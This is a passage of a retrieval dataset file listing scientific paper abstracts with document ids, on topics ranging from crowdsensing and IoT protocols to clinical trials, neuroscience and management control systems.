All rights reserved.",
"title": ""
}
] | [
{
"docid": "8af3b1f6b06ff91dee4473bfb50c420d",
"text": "Crowdsensing technologies are rapidly evolving and are expected to be utilized on commercial applications such as location-based services. Crowdsensing collects sensory data from daily activities of users without burdening users, and the data size is expected to grow into a population scale. However, quality of service is difficult to ensure for commercial use. Incentive design in crowdsensing with monetary rewards or gamifications is, therefore, attracting attention for motivating participants to collect data to increase data quantity. In contrast, we propose Steered Crowdsensing, which controls the incentives of users by using the game elements on location-based services for directly improving the quality of service rather than data size. For a feasibility study of steered crowdsensing, we deployed a crowdsensing system focusing on application scenarios of building processes on wireless indoor localization systems. In the results, steered crowdsensing realized deployments faster than non-steered crowdsensing while having half as many data.",
"title": ""
},
{
"docid": "32ae0b0c5b3ca3a7ede687872d631d29",
"text": "Background—The benefit of catheter-based reperfusion for acute myocardial infarction (MI) is limited by a 5% to 15% incidence of in-hospital major ischemic events, usually caused by infarct artery reocclusion, and a 20% to 40% need for repeat percutaneous or surgical revascularization. Platelets play a key role in the process of early infarct artery reocclusion, but inhibition of aggregation via the glycoprotein IIb/IIIa receptor has not been prospectively evaluated in the setting of acute MI. Methods and Results —Patients with acute MI of,12 hours’ duration were randomized, on a double-blind basis, to placebo or abciximab if they were deemed candidates for primary PTCA. The primary efficacy end point was death, reinfarction, or any (urgent or elective) target vessel revascularization (TVR) at 6 months by intention-to-treat (ITT) analysis. Other key prespecified end points were early (7 and 30 days) death, reinfarction, or urgent TVR. The baseline clinical and angiographic variables of the 483 (242 placebo and 241 abciximab) patients were balanced. There was no difference in the incidence of the primary 6-month end point (ITT analysis) in the 2 groups (28.1% and 28.2%, P50.97, of the placebo and abciximab patients, respectively). However, abciximab significantly reduced the incidence of death, reinfarction, or urgent TVR at all time points assessed (9.9% versus 3.3%, P50.003, at 7 days; 11.2% versus 5.8%, P50.03, at 30 days; and 17.8% versus 11.6%, P50.05, at 6 months). Analysis by actual treatment with PTCA and study drug demonstrated a considerable effect of abciximab with respect to death or reinfarction: 4.7% versus 1.4%, P50.047, at 7 days; 5.8% versus 3.2%, P50.20, at 30 days; and 12.0% versus 6.9%, P50.07, at 6 months. The need for unplanned, “bail-out” stenting was reduced by 42% in the abciximab group (20.4% versus 11.9%, P50.008). Major bleeding occurred significantly more frequently in the abciximab group (16.6% versus 9.5%, P 0.02), mostly at the arterial access site. There was no intracranial hemorrhage in either group. Conclusions—Aggressive platelet inhibition with abciximab during primary PTCA for acute MI yielded a substantial reduction in the acute (30-day) phase for death, reinfarction, and urgent target vessel revascularization. However, the bleeding rates were excessive, and the 6-month primary end point, which included elective revascularization, was not favorably affected.(Circulation. 1998;98:734-741.)",
"title": ""
},
{
"docid": "66313e7ec725fa6081a9d834ce87cb2e",
"text": "In this paper, the DCXO is based on a Pierce oscillator with two MIM capacitor arrays for tuning the anti-resonant frequency of a 19.2MHz crystal. Each array of MIM capacitors is thermometer-coded and formatted in a matrix shape to facilitate layout. Although a segmented architecture is an area-efficient method for implementing a SC array, a thermometer-coded array provides the best linearity and guarantees a monotonic frequency tuning characteristic, which is of utmost importance in an AFC system.",
"title": ""
},
{
"docid": "783d7251658f9077e05a7b1b9bd60835",
"text": "A method is presented for the representation of (pictures of) faces. Within a specified framework the representation is ideal. This results in the characterization of a face, to within an error bound, by a relatively low-dimensional vector. The method is illustrated in detail by the use of an ensemble of pictures taken for this purpose.",
"title": ""
},
{
"docid": "3f0286475580e4c5663023593ef12aff",
"text": "ABSRACT Sliding mode control has received much attention due to its major advantages such as guaranteed stability, robustness against parameter variations, fast dynamic response and simplicity in the implementation and therefore has been widely applied to control nonlinear systems. This paper discus the sliding mode control technic for controlling hydropower system and generalized a model which can be used to simulate a hydro power plant using MATLAB/SIMULINK. This system consist hydro turbine connected to a generator coaxially, which is connected to grid. Simulation of the system can be done using various simulation tools, but SIMULINK is preferred because of simplicity and useful basic function blocks. The Simulink program is used to obtain the systematic dynamic model of the system and testing the operation with different PID controllers, SMC controller with additional integral action.",
"title": ""
},
{
"docid": "3c778c71f621b2c887dc81e7a919058e",
"text": "We have witnessed the Fixed Internet emerging with virtually every computer being connected today; we are currently witnessing the emergence of the Mobile Internet with the exponential explosion of smart phones, tablets and net-books. However, both will be dwarfed by the anticipated emergence of the Internet of Things (IoT), in which everyday objects are able to connect to the Internet, tweet or be queried. Whilst the impact onto economies and societies around the world is undisputed, the technologies facilitating such a ubiquitous connectivity have struggled so far and only recently commenced to take shape. To this end, this paper introduces in a timely manner and for the first time the wireless communications stack the industry believes to meet the important criteria of power-efficiency, reliability and Internet connectivity. Industrial applications have been the early adopters of this stack, which has become the de-facto standard, thereby bootstrapping early IoT developments with already thousands of wireless nodes deployed. Corroborated throughout this paper and by emerging industry alliances, we believe that a standardized approach, using latest developments in the IEEE 802.15.4 and IETF working groups, is the only way forward. We introduce and relate key embodiments of the power-efficient IEEE 802.15.4-2006 PHY layer, the power-saving and reliable IEEE 802.15.4e MAC layer, the IETF 6LoWPAN adaptation layer enabling universal Internet connectivity, the IETF ROLL routing protocol enabling availability, and finally the IETF CoAP enabling seamless transport and support of Internet applications. The protocol stack proposed in the present work converges towards the standardized notations of the ISO/OSI and TCP/IP stacks. What thus seemed impossible some years back, i.e., building a clearly defined, standards-compliant and Internet-compliant stack given the extreme restrictions of IoT networks, is commencing to become reality.",
"title": ""
},
{
"docid": "95b3c332334b002c8fa086d97a471c17",
"text": "Reliability is becoming more and more important as the size and number of installed Wind Turbines (WTs) increases. Very high reliability is especially important for offshore WTs because the maintenance and repair of such WTs in case of failures can be very expensive. WT manufacturers need to consider the reliability aspect when they design new power converters. By designing the power converter considering the reliability aspect the manufacturer can guarantee that the end product will ensure high availability. This paper represents an overview of the various aspects of reliability prediction of high power Insulated Gate Bipolar Transistors (IGBTs) in the context of wind power applications. At first the latest developments and future predictions about wind energy are briefly discussed. Next the dominant failure mechanisms of high power IGBTs are described and the most commonly used lifetime prediction models are reviewed. Also the concept of Accelerated Life Testing (ALT) is briefly reviewed.",
"title": ""
},
{
"docid": "f372bc2ed27f5d4c08087ddc46e5373e",
"text": "This work investigates the practice of credit scoring and introduces the use of the clustered support vector machine (CSVM) for credit scorecard development. This recently designed algorithm addresses some of the limitations noted in the literature that is associated with traditional nonlinear support vector machine (SVM) based methods for classification. Specifically, it is well known that as historical credit scoring datasets get large, these nonlinear approaches while highly accurate become computationally expensive. Accordingly, this study compares the CSVM with other nonlinear SVM based techniques and shows that the CSVM can achieve comparable levels of classification performance while remaining relatively cheap computationally. 2014 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "b7959c06c8057418762e12ef2c0ce2ce",
"text": "According to Bayesian theories in psychology and neuroscience, minds and brains are (near) optimal in solving a wide range of tasks. We challenge this view and argue that more traditional, non-Bayesian approaches are more promising. We make 3 main arguments. First, we show that the empirical evidence for Bayesian theories in psychology is weak. This weakness relates to the many arbitrary ways that priors, likelihoods, and utility functions can be altered in order to account for the data that are obtained, making the models unfalsifiable. It further relates to the fact that Bayesian theories are rarely better at predicting data compared with alternative (and simpler) non-Bayesian theories. Second, we show that the empirical evidence for Bayesian theories in neuroscience is weaker still. There are impressive mathematical analyses showing how populations of neurons could compute in a Bayesian manner but little or no evidence that they do. Third, we challenge the general scientific approach that characterizes Bayesian theorizing in cognitive science. A common premise is that theories in psychology should largely be constrained by a rational analysis of what the mind ought to do. We question this claim and argue that many of the important constraints come from biological, evolutionary, and processing (algorithmic) considerations that have no adaptive relevance to the problem per se. In our view, these factors have contributed to the development of many Bayesian \"just so\" stories in psychology and neuroscience; that is, mathematical analyses of cognition that can be used to explain almost any behavior as optimal.",
"title": ""
},
{
"docid": "bdbd3d65c79e4f22d2e85ac4137ee67a",
"text": "With the advances in new-generation information technologies, especially big data and digital twin, smart manufacturing is becoming the focus of global manufacturing transformation and upgrading. Intelligence comes from data. Integrated analysis for the manufacturing big data is beneficial to all aspects of manufacturing. Besides, the digital twin paves a way for the cyber-physical integration of manufacturing, which is an important bottleneck to achieve smart manufacturing. In this paper, the big data and digital twin in manufacturing are reviewed, including their concept as well as their applications in product design, production planning, manufacturing, and predictive maintenance. On this basis, the similarities and differences between big data and digital twin are compared from the general and data perspectives. Since the big data and digital twin can be complementary, how they can be integrated to promote smart manufacturing are discussed.",
"title": ""
},
{
"docid": "f5a7a4729f9374ee7bee4401475647f9",
"text": "In the last decade, deep learning has contributed to advances in a wide range computer vision tasks including texture analysis. This paper explores a new approach for texture segmentation using deep convolutional neural networks, sharing important ideas with classic filter bank based texture segmentation methods. Several methods are developed to train Fully Convolutional Networks to segment textures in various applications. We show in particular that these networks can learn to recognize and segment a type of texture, e.g. wood and grass from texture recognition datasets (no training segmentation). We demonstrate that Fully Convolutional Networks can learn from repetitive patterns to segment a particular texture from a single image or even a part of an image. We take advantage of these findings to develop a method that is evaluated on a series of supervised and unsupervised experiments and improve the state of the art on the Prague texture segmentation datasets.",
"title": ""
},
{
"docid": "3250454b6363a9bb49590636d9843a92",
"text": "A low precision deep neural network training technique for producing sparse, ternary neural networks is presented. The technique incorporates hardware implementation costs during training to achieve significant model compression for inference. Training involves three stages: network training using L2 regularization and a quantization threshold regularizer, quantization pruning, and finally retraining. Resulting networks achieve improved accuracy, reduced memory footprint and reduced computational complexity compared with conventional methods, on MNIST and CIFAR10 datasets. Our networks are up to 98% sparse and 5 & 11 times smaller than equivalent binary and ternary models, translating to significant resource and speed benefits for hardware implementations.",
"title": ""
},
{
"docid": "498efbd728aec5dba57788af33bd404d",
"text": "Functional connectivity (FC) sheds light on the interactions between different brain regions. Besides basic research, it is clinically relevant for applications in Alzheimer's disease, schizophrenia, presurgical planning, epilepsy, and traumatic brain injury. Simulations of whole-brain mean-field computational models with realistic connectivity determined by tractography studies enable us to reproduce with accuracy aspects of average FC in the resting state. Most computational studies, however, did not address the prominent non-stationarity in resting state FC, which may result in large intra- and inter-subject variability and thus preclude an accurate individual predictability. Here we show that this non-stationarity reveals a rich structure, characterized by rapid transitions switching between a few discrete FC states. We also show that computational models optimized to fit time-averaged FC do not reproduce these spontaneous state transitions and, thus, are not qualitatively superior to simplified linear stochastic models, which account for the effects of structure alone. We then demonstrate that a slight enhancement of the non-linearity of the network nodes is sufficient to broaden the repertoire of possible network behaviors, leading to modes of fluctuations, reminiscent of some of the most frequently observed Resting State Networks. Because of the noise-driven exploration of this repertoire, the dynamics of FC qualitatively change now and display non-stationary switching similar to empirical resting state recordings (Functional Connectivity Dynamics (FCD)). Thus FCD bear promise to serve as a better biomarker of resting state neural activity and of its pathologic alterations.",
"title": ""
},
{
"docid": "5fc9fe7bcc50aad948ebb32aefdb2689",
"text": "This paper explores the use of set expansion (SE) to improve question answering (QA) when the expected answer is a list of entities belonging to a certain class. Given a small set of seeds, SE algorithms mine textual resources to produce an extended list including additional members of the class represented by the seeds. We explore the hypothesis that a noise-resistant SE algorithm can be used to extend candidate answers produced by a QA system and generate a new list of answers that is better than the original list produced by the QA system. We further introduce a hybrid approach which combines the original answers from the QA system with the output from the SE algorithm. Experimental results for several state-of-the-art QA systems show that the hybrid system performs better than the QA systems alone when tested on list question data from past TREC evaluations.",
"title": ""
},
{
"docid": "48966a0436405a6656feea3ce17e87c3",
"text": "Complex regional pain syndrome (CRPS) is a chronic, intensified localized pain condition that can affect children and adolescents as well as adults, but is more common among adolescent girls. Symptoms include limb pain; allodynia; hyperalgesia; swelling and/or changes in skin color of the affected limb; dry, mottled skin; hyperhidrosis and trophic changes of the nails and hair. The exact mechanism of CRPS is unknown, although several different mechanisms have been suggested. The diagnosis is clinical, with the aid of the adult criteria for CRPS. Standard care consists of a multidisciplinary approach with the implementation of intensive physical therapy in conjunction with psychological counseling. Pharmacological treatments may aid in reducing pain in order to allow the patient to participate fully in intensive physiotherapy. The prognosis in pediatric CRPS is favorable.",
"title": ""
},
{
"docid": "6e6237011de5348d9586fb70941b4037",
"text": "BACKGROUND\nAlthough clinicians frequently add a second medication to an initial, ineffective antidepressant drug, no randomized controlled trial has compared the efficacy of this approach.\n\n\nMETHODS\nWe randomly assigned 565 adult outpatients who had nonpsychotic major depressive disorder without remission despite a mean of 11.9 weeks of citalopram therapy (mean final dose, 55 mg per day) to receive sustained-release bupropion (at a dose of up to 400 mg per day) as augmentation and 286 to receive buspirone (at a dose of up to 60 mg per day) as augmentation. The primary outcome of remission of symptoms was defined as a score of 7 or less on the 17-item Hamilton Rating Scale for Depression (HRSD-17) at the end of this study; scores were obtained over the telephone by raters blinded to treatment assignment. The 16-item Quick Inventory of Depressive Symptomatology--Self-Report (QIDS-SR-16) was used to determine the secondary outcomes of remission (defined as a score of less than 6 at the end of this study) and response (a reduction in baseline scores of 50 percent or more).\n\n\nRESULTS\nThe sustained-release bupropion group and the buspirone group had similar rates of HRSD-17 remission (29.7 percent and 30.1 percent, respectively), QIDS-SR-16 remission (39.0 percent and 32.9 percent), and QIDS-SR-16 response (31.8 percent and 26.9 percent). Sustained-release bupropion, however, was associated with a greater reduction (from baseline to the end of this study) in QIDS-SR-16 scores than was buspirone (25.3 percent vs. 17.1 percent, P<0.04), a lower QIDS-SR-16 score at the end of this study (8.0 vs. 9.1, P<0.02), and a lower dropout rate due to intolerance (12.5 percent vs. 20.6 percent, P<0.009).\n\n\nCONCLUSIONS\nAugmentation of citalopram with either sustained-release bupropion or buspirone appears to be useful in actual clinical settings. Augmentation with sustained-release bupropion does have certain advantages, including a greater reduction in the number and severity of symptoms and fewer side effects and adverse events. (ClinicalTrials.gov number, NCT00021528.).",
"title": ""
},
{
"docid": "8d6c928b7e4fd415eaee11e0c932cbf1",
"text": "Journal of Location Based Services Publication details, including instructions for authors and subscription information: http://www.informaworld.com/smpp/title~content=t744398445 Applications of location-based services: a selected review Jonathan Raper a; Georg Gartner b; Hassan Karimi c; Chris Rizos d a Information Science, Northampton Square, City University, London, UK b Department of Geoinformation and Cartography, Vienna University of Technology, Erzherzog-Johannplatz 1, Austria c University of Pittsburgh, PA, USA d School of Surverying 2 SIS, University of New South Wales, Sydney, Australia",
"title": ""
},
{
"docid": "e6e34a487a006aa38a98573b34b9c437",
"text": "In this paper, we study the problem of training largescale face identification model with imbalanced training data. This problem naturally exists in many real scenarios including large-scale celebrity recognition, movie actor annotation, etc. Our solution contains two components. First, we build a face feature extraction model, and improve its performance, especially for the persons with very limited training samples, by introducing a regularizer to the cross entropy loss for the multinomial logistic regression (MLR) learning. This regularizer encourages the directions of the face features from the same class to be close to the direction of their corresponding classification weight vector in the logistic regression. Second, we build a multiclass classifier using MLR on top of the learned face feature extraction model. Since the standard MLR has poor generalization capability for the one-shot classes even if these classes have been oversampled, we propose a novel supervision signal called underrepresented-classes promotion loss, which aligns the norms of the weight vectors of the one-shot classes (a.k.a. underrepresented-classes) to those of the normal classes. In addition to the original cross entropy loss, this new loss term effectively promotes the underrepresented classes in the learned model and leads to a remarkable improvement in face recognition performance. We test our solution on the MS-Celeb-1M low-shot learning benchmark task. Our solution recognizes 94.89% of the test images at the precision of 99% for the one-shot classes. To the best of our knowledge, this is the best performance among all the published methods using this benchmark task with the same setup, including all the participants in the recent MS-Celeb-1M challenge at ICCV 2017.",
"title": ""
},
{
"docid": "617382c83d0af103e977edb3b5b2fba1",
"text": "With the rapid development of location-based social networks (LBSNs), spatial item recommendation has become an important mobile application, especially when users travel away from home. However, this type of recommendation is very challenging compared to traditional recommender systems. A user may visit only a limited number of spatial items, leading to a very sparse user-item matrix. This matrix becomes even sparser when the user travels to a distant place, as most of the items visited by a user are usually located within a short distance from the user’s home. Moreover, user interests and behavior patterns may vary dramatically across different time and geographical regions. In light of this, we propose ST-SAGE, a spatial-temporal sparse additive generative model for spatial item recommendation in this article. ST-SAGE considers both personal interests of the users and the preferences of the crowd in the target region at the given time by exploiting both the co-occurrence patterns and content of spatial items. To further alleviate the data-sparsity issue, ST-SAGE exploits the geographical correlation by smoothing the crowd’s preferences over a well-designed spatial index structure called the spatial pyramid. To speed up the training process of ST-SAGE, we implement a parallel version of the model inference algorithm on the GraphLab framework. We conduct extensive experiments; the experimental results clearly demonstrate that ST-SAGE outperforms the state-of-the-art recommender systems in terms of recommendation effectiveness, model training efficiency, and online recommendation efficiency.",
"title": ""
},
{
"docid": "8074ecf8bd73c4add9e01f0b84ed6e70",
"text": "This paper provides a survey on implementing wireless sensor network (WSN) technology on industrial process monitoring and control. First, the existing industrial applications are explored, following with a review of the advantages of adopting WSN technology for industrial control. Then, challenging factors influencing the design and acceptance of WSNs in the process control world are outlined, and the state-of-the-art research efforts and industrial solutions are provided corresponding to each factor. Further research issues for the realization and improvement of wireless sensor network technology on process industry are also mentioned.",
"title": ""
}
] | scidocsrr |
5806ed49e737878c95104e9e3ddde4f6 | Using machine learning techniques to detect metamorphic relations for programs without test oracles | [
{
"docid": "32c5bbc07cba1aac769ee618e000a4a5",
"text": "In this paper we present Jimple, a 3-address intermediate representation that has been designed to simplify analysis and transformation of Java bytecode. We motivate the need for a new intermediate representation by illustrating several difficulties with optimizing the stack-based Java bytecode directly. In general, these difficulties are due to the fact that bytecode instructions affect an expression stack, and thus have implicit uses and definitions of stack locations. We propose Jimple as an alternative representation, in which each statement refers explicitly to the variables it uses. We provide both the definition of Jimple and a complete procedure for translating from Java bytecode to Jimple. This definition and translation have been implemented using Java, and finally we show how this implementation forms the heart of the Sable research projects.",
"title": ""
},
{
"docid": "e31fd6ce6b78a238548e802d21b05590",
"text": "Machine learning techniques have long been used for various purposes in software engineering. This paper provides a brief overview of the state of the art and reports on a number of novel applications I was involved with in the area of software testing. Reflecting on this personal experience, I draw lessons learned and argue that more research should be performed in that direction as machine learning has the potential to significantly help in addressing some of the long-standing software testing problems.",
"title": ""
}
] | [
{
"docid": "0ff727ff06c02d2e371798ad657153c9",
"text": "Most approaches to human attribute and action recognition in still images are based on image representation in which multi-scale local features are pooled across scale into a single, scale-invariant encoding. Both in bag-of-words and the recently popular representations based on convolutional neural networks, local features are computed at multiple scales. However, these multi-scale convolutional features are pooled into a single scale-invariant representation. We argue that entirely scale-invariant image representations are sub-optimal and investigate approaches to scale coding within a bag of deep features framework. Our approach encodes multi-scale information explicitly during the image encoding stage. We propose two strategies to encode multi-scale information explicitly in the final image representation. We validate our two scale coding techniques on five datasets: Willow, PASCAL VOC 2010, PASCAL VOC 2012, Stanford-40 and Human Attributes (HAT-27). On all datasets, the proposed scale coding approaches outperform both the scale-invariant method and the standard deep features of the same network. Further, combining our scale coding approaches with standard deep features leads to consistent improvement over the state of the art.",
"title": ""
},
{
"docid": "bc3018c825e6866a225bc43876f5560e",
"text": "Video co-localization is the task of jointly localizing common objects across videos. Due to the appearance variations both across the videos and within the video, it is a challenging problem to identify and track them without any supervision. In contrast to previous joint frameworks that use bounding box proposals to attack the problem, we propose to leverage co-saliency activated tracklets to address the challenge. To identify the common visual object, we first explore inter-video commonness, intra-video commonness, and motion saliency to generate the co-saliency maps. Object proposals of high objectness and co-saliency scores are tracked across short video intervals to build tracklets. The best tube for a video is obtained through tracklet selection from these intervals based on confidence and smoothness between the adjacent tracklets, with the help of dynamic programming. Experimental results on the benchmark YouTube Object dataset show that the proposed method outperforms state-of-the-art methods.",
"title": ""
},
{
"docid": "d2d79c26082258264265d7b569060a23",
"text": "Online communities are valuable information sources where knowledge is accumulated by interactions between people. Search services provided by online community sites such as forums are often, however, quite poor. To address this, we investigate retrieval techniques that exploit the hierarchical thread structures in community sites. Since these structures are sometimes not explicit or accurately annotated, we use structure discovery techniques. We then make use of thread structures in retrieval experiments. Our results show that using thread structures that have been accurately annotated can lead to significant improvements in retrieval performance compared to strong baselines.",
"title": ""
},
{
"docid": "803b8189288dc07411c4e9e48dcac9b2",
"text": "Machine-to-machine (M2M) communication is becoming an increasingly important part of mobile traffic and thus also a topic of major interest for mobile communication research and telecommunication standardization bodies. M2M communication offers various ubiquitous services and is one of the main enablers of the vision inspired by the Internet of Things (IoT). The concept of mobile M2M communication has emerged due to the wide range, coverage provisioning, high reliability, and decreasing costs of future mobile networks. Nevertheless, M2M communications pose significant challenges to mobile networks, e.g., due to the expected large number of devices with simultaneous access for sending small-sized data, and a diverse application range. This paper provides a detailed survey of M2M communications in the context of mobile networks, and thus focuses on the latest Long-Term Evolution-Advanced (LTE-A) networks. Moreover, the end-to-end network architectures and reference models for M2M communication are presented. Furthermore, a comprehensive survey is given to M2M service requirements, major current standardization efforts, and upcoming M2M-related challenges. In addition, an overview of upcoming M2M services expected in 5G networks is presented. In the end, various mobile M2M applications are discussed followed by open research questions and directions.",
"title": ""
},
{
"docid": "65f487474652d87022da819815e6bced",
"text": "Chinese input is one of the key challenges for Chinese PC users. This paper proposes a statistical approach to Pinyin-based Chinese input. This approach uses a trigram-based language model and a statistically based segmentation. Also, to deal with real input, it also includes a typing model which enables spelling correction in sentence-based Pinyin input, and a spelling model for English which enables modeless Pinyin input.",
"title": ""
},
{
"docid": "aa0bd00ca5240e462e49df3d1bd3487e",
"text": "The choice of the CMOS logic to be used for implementation of a given specification is usually dependent on the optimization and the performance constraints that the finished chip is required to meet. This paper presents a comparative study of CMOS static and dynamic logic. Effect of voltage variation on power and delay of static and dynamic CMOS logic styles studied. The performance of static logic is better than dynamic logic for designing basic logic gates like NAND and NOR. But the dynamic casecode voltage switch logic (CVSL) achieves better performance. 75% lesser power delay product is achieved than that of static CVSL. However, it observed that dynamic logic performance is better for higher fan in and complex logic circuits.",
"title": ""
},
{
"docid": "5214f391d5b152f9809bec1f6f069d21",
"text": "Abstract—Magnetic resonance imaging (MRI) is an important diagnostic imaging technique for the early detection of brain cancer. Brain cancer is one of the most dangerous diseases occurring commonly among human beings. The chances of survival can be increased if the cancer is detected at its early stage. MRI brain image plays a vital role in assisting radiologists to access patients for diagnosis and treatment. Studying of medical image by the Radiologist is not only a tedious and time consuming process but also accuracy depends upon their experience. So, the use of computer aided systems becomes very necessary to overcome these limitations. Even though several automated methods are available, still segmentation of MRI brain image remains as a challenging problem due to its complexity and there is no standard algorithm that can produce satisfactory results. In this review paper, various current methodologies of brain image segmentation using automated algorithms that are accurate and requires little user interaction are reviewed and their advantages, disadvantages are discussed. This review paper guides in combining two or more methods together to produce accurate results.",
"title": ""
},
{
"docid": "afd1bc554857a1857ac4be5ee37cc591",
"text": "0953-5438/$ see front matter 2011 Elsevier B.V. A doi:10.1016/j.intcom.2011.04.007 ⇑ Corresponding author. E-mail addresses: m.cole@rutgers.edu (M.J. Co (J. Gwizdka), changl@eden.rutgers.edu (C. Liu), ralf@b rutgers.edu (N.J. Belkin), xiangminz@gmail.com (X. Zh We report on an investigation into people’s behaviors on information search tasks, specifically the relation between eye movement patterns and task characteristics. We conducted two independent user studies (n = 32 and n = 40), one with journalism tasks and the other with genomics tasks. The tasks were constructed to represent information needs of these two different users groups and to vary in several dimensions according to a task classification scheme. For each participant we classified eye gaze data to construct models of their reading patterns. The reading models were analyzed with respect to the effect of task types and Web page types on reading eye movement patterns. We report on relationships between tasks and individual reading behaviors at the task and page level. Specifically we show that transitions between scanning and reading behavior in eye movement patterns and the amount of text processed may be an implicit indicator of the current task type facets. This may be useful in building user and task models that can be useful in personalization of information systems and so address design demands driven by increasingly complex user actions with information systems. One of the contributions of this research is a new methodology to model information search behavior and investigate information acquisition and cognitive processing in interactive information tasks. 2011 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "511db40bbc4d24ca8d09b5343aa8d91e",
"text": "Increased risk taking may explain the link between bad moods and self-defeating behavior. In Study 1, personal recollections of self-defeating actions implicated bad moods and resultant risky decisions. In Study 2, embarrassment increased the preference for a long-shot (high-risk, high-payoff) lottery over a low-risk, low-payoff one. Anger had a similar effect in Study 3. Study 4 replicated this and showed that the effect could be eliminated by making participants analyze the lotteries rationally, suggesting that bad moods foster risk taking by impairing self-regulation instead of by altering subjective utilities. Studies 5 and 6 showed that the risky tendencies are limited to unpleasant moods accompanied by high arousal; neither sadness nor neutral arousal resulted in destructive risk taking.",
"title": ""
},
{
"docid": "b96a571e57a3121746d841bed4af4dbe",
"text": "The Open Provenance Model is a model of provenance that is designed to meet the following requirements: (1) To allow provenance information to be exchanged between systems, by means of a compatibility layer based on a shared provenance model. (2) To allow developers to build and share tools that operate on such a provenance model. (3) To define provenance in a precise, technology-agnostic manner. (4) To support a digital representation of provenance for any “thing”, whether produced by computer systems or not. (5) To allow multiple levels of description to coexist. (6) To define a core set of rules that identify the valid inferences that can be made on provenance representation. This document contains the specification of the Open Provenance Model (v1.1) resulting from a community effort to achieve inter-operability in the Provenance Challenge series.",
"title": ""
},
{
"docid": "a287e289fcf2d7e56069fabd90227c7a",
"text": "The mixing of audio signals has been at the foundation of audio production since the advent of electrical recording in the 1920’s, yet the mathematical and psychological bases for this activity are relatively under-studied. This paper investigates how the process of mixing music is conducted. We introduce a method of transformation from a “gainspace” to a “mix-space”, using a novel representation of the individual track gains. An experiment is conducted in order to obtain time-series data of mix engineers exploration of this space as they adjust levels within a multitrack session to create their desired mixture. It is observed that, while the exploration of the space is influenced by the initial configuration of track gains, there is agreement between individuals on the appropriate gain settings required to create a balanced mixture. Implications for the design of intelligent music production systems are discussed.",
"title": ""
},
{
"docid": "91365154a173be8be29ef14a3a76b08e",
"text": "Fraud is a criminal practice for illegitimate gain of wealth or tampering information. Fraudulent activities are of critical concern because of their severe impact on organizations, communities as well as individuals. Over the last few years, various techniques from different areas such as data mining, machine learning, and statistics have been proposed to deal with fraudulent activities. Unfortunately, the conventional approaches display several limitations, which were addressed largely by advanced solutions proposed in the advent of Big Data. In this paper, we present fraud analysis approaches in the context of Big Data. Then, we study the approaches rigorously and identify their limits by exploiting Big Data analytics.",
"title": ""
},
{
"docid": "20d754528009ebce458eaa748312b2fe",
"text": "This poster provides a comparative study between Inverse Reinforcement Learning (IRL) and Apprenticeship Learning (AL). IRL and AL are two frameworks, using Markov Decision Processes (MDP), which are used for the imitation learning problem where an agent tries to learn from demonstrations of an expert. In the AL framework, the agent tries to learn the expert policy whereas in the IRL framework, the agent tries to learn a reward which can explain the behavior of the expert. This reward is then optimized to imitate the expert. One can wonder if it is worth estimating such a reward, or if estimating a policy is sufficient. This quite natural question has not really been addressed in the literature right now. We provide partial answers, both from a theoretical and empirical point of view.",
"title": ""
},
{
"docid": "043726d6fb1666f44e05e074382b21ad",
"text": "Context exerts a powerful effect on cognitive performance and is clearly important for language processing, where lexical, sentential, and narrative contexts should differentially engage neural systems that support lexical, compositional, and discourse level semantics. Equally important, but thus far unexplored, is the role of context within narrative, as cognitive demands evolve and brain activity changes dynamically as subjects process different narrative segments. In this study, we used fMRI to examine the impact of context, comparing responses to a single, linguistically matched set of texts when these were differentially presented as random word lists, unconnected sentences and coherent narratives. We found emergent, context-dependent patterns of brain activity in each condition. Perisylvian language areas were always active, consistent with their supporting core linguistic computations. Sentence processing was associated with expanded activation of the frontal operculum and temporal poles. The same stimuli presented as narrative evoked robust responses in extrasylvian areas within both hemispheres, including precuneus, medial prefrontal, and dorsal temporo-parieto-occipital cortices. The right hemisphere was increasingly active as contextual complexity increased, maximal at the narrative level. Furthermore, brain activity was dynamically modulated as subjects processed different narrative segments: left hemisphere activity was more prominent at the onset, and right hemisphere more prominent at the resolution of a story, at which point, it may support a coherent representation of the narrative as a whole. These results underscore the importance of studying language in an ecologically valid context, suggesting a neural model for the processing of discourse.",
"title": ""
},
{
"docid": "79ddf1042ce5b40306e0596851da93a2",
"text": "Introduction: Recently, radiofrequency ablation (RFA) has been increasingly used for the treatment of thyroid nodules. However, immediate morphological changes associated with bipolar devices are poorly shown. Aims: To present the results of analysis of gross and microscopic alterations in human thyroid tissue induced by RFA delivered through the application of the original patented device. Materials and methods: In total, there were 37 surgically removed thyroid glands in females aged 32-67 at presentation: 16 nodules were follicular adenoma (labelled as 'parenchymal' solid benign nodules) and adenomatous colloid goitre was represented by 21 cases. The thyroid gland was routinely processed and the nodules were sliced into two parts - one was a subject for histological routine processing according to the principles that universally apply in surgical pathology, the other one was used for the RFA procedure. Results: No significant difference in size reduction between parenchymal and colloid nodules was revealed (p>0.1, t-test) straight after the treatment. In addition, RFA equally effectively induced necrosis in follicular adenoma and adenomatous colloid goitre (p>0.1, analysis of variance test). As expected, tumour size correlated with size reduction (the smaller the size of the nodule, the greater percentage of the nodule volume that was ablated): r=-0.48 (p<0.0001). Conclusion: The results make it possible to move from ex vivo experiments to clinical practice.",
"title": ""
},
{
"docid": "080e7880623a09494652fd578802c156",
"text": "Whole-cell biosensors are a good alternative to enzyme-based biosensors since they offer the benefits of low cost and improved stability. In recent years, live cells have been employed as biosensors for a wide range of targets. In this review, we will focus on the use of microorganisms that are genetically modified with the desirable outputs in order to improve the biosensor performance. Different methodologies based on genetic/protein engineering and synthetic biology to construct microorganisms with the required signal outputs, sensitivity, and selectivity will be discussed.",
"title": ""
},
{
"docid": "b2be1256b16382e41381cc8373922ea9",
"text": "This paper reviews research that studies the relationship between management control systems (MCS) and business strategy. Empirical research studies that use contingency approaches and case study applications are examin ed focusing on specific aspects of MCS and their relationship with strategy. These aspects include cost control orientation, performance evaluation and reward systems, the effect of resource sharing, the role of MCS in influencing strategic change and the choice of interactive and diagnostic controls. More contemporary approaches to the relationship between performance measurement systems and strategy are also considered. It is concluded that our knowledge of the relationship between MCS and strategy is limited, providing considerable scope for further research. A series of future research questions is presented.@ 1997 Elsevier Science Ltd. All rights reserved In recent years there has been a growing interest in the relationship between management control systems (MCS) and strategy. It has been suggested that the MCS should be tailored explicitly to support the strategy of the business to lead to competitive advantage and superior performance (Dent, 1990; Samson et al., 1991; Simons, 1987a, 1990). Also, there is evidence that high organizational performance may result from a matching of an organization’s environment, strategy and internal structures and systems (Govindarajan & Gupta, 1985; Govindarajan, 198@). Strategy was not used explicitly as a variable in MCS research until the 1980s. This is surprising considering the field of business 